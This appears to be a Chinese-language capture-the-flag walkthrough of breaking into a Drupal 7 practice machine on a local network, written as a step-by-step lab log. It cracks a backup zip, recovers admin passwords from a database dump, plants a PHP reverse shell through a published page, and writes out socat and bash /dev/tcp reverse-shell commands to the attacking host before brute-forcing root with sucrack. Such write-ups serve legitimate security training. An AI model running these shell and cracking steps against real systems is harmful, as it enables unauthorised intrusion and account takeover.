通过扫描发现目标使用Drupal框架并存在多个漏洞。利用Zip文件密码爆破获取管理账号,借助已知Drupal7漏洞实现Webshell植入,最终通过socat工具完成本地提权。
使用netdiscover针对局域网中主机进行扫描存活
这里Kali攻击机器是192.168.0.106
目标靶机位192.168.0.105
常规的信息收集
端口
存在默认http端口 使用apache 2.4.25 使用debian系统
此中间件版本存在解析漏洞,之后可以用在文件上传上面
目录
Backup中获得加密的zip文件
Drupal CMS存在许多漏洞
CMS漏洞扫描
https://www.ddosi.com/cms-scan/ 推荐的扫描器集合
目前已经确认网站使用durpal框架
获取更多的暴露面
目前已经拿到backup加密压缩文件以及登录页面
Durpal 7 版本
先查看文件是zip文件但是存在密码
使用zip2john 获取hash值
在使用john进行爆破hash
卒
换fcrackzip
密码为thebackup
Unzip解压查看压缩包内容
使用cat命令查看dump.sql也就是压缩包的文件内容
上somd5 查看
root:drupal
webman:moranguita
将获得账户密码登录drupal管理页面
使用webman用户登录成功
进入后台之后要获取shell
- 知道框架为drupal 7 可以使用已知的漏洞来打下
- 寻找上传点
- 查看是否存在系统工具存在RCE
- 发布网页直接使用php反弹shell
- 也可以文件包含我们写好的小马网页
此处我们可以直接发布一个网页,插入php反弹shell,当我们发布的时候使用nc进行本地监听端口即可。
从上图可以看到,我们没有安装php的插件,是不会进行解析的,我们需要到插件中安装
最后要保存配置
修改反弹ip以及监听端口
使用nc在本地进行监听
Nc –nvlp 5050
监听后发布文章
获取www-data权限
进行本地提权
本地提权的前提也是需要信息收集
他没有安装python2
我们使用socat工具反弹一个shell
Socat安装链接
https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat
上图,在kali中使用python开启simplehttpsever服务
靶机使用wget命令获取socat工具
在Kali中设置socat监听
socat file:`tty`,raw,echo=0 tcp-listen:5051
靶机中执行
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.0.106:5051
以上相同可以使用nc作为监听
Nc –nvlp 5051
靶机中也可以使用bash反弹
bash -c 'bash >&/dev/tcp/192.168.0.106/5051 0>&1'
获取一个新的tty之后
本地提权的信息收集:
在home/user下找到提示
Rockyou的前300条是root用户的密码
在kali中使用head命令
上图完成前300条的字典
使用sucrack工具进行本地密码的爆破
找到kali系统sucrack工具存放的位置:
将sucrack工具和1.txt字典一共传到靶机/tmp文件夹下
使用sucrack工具进行爆破
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
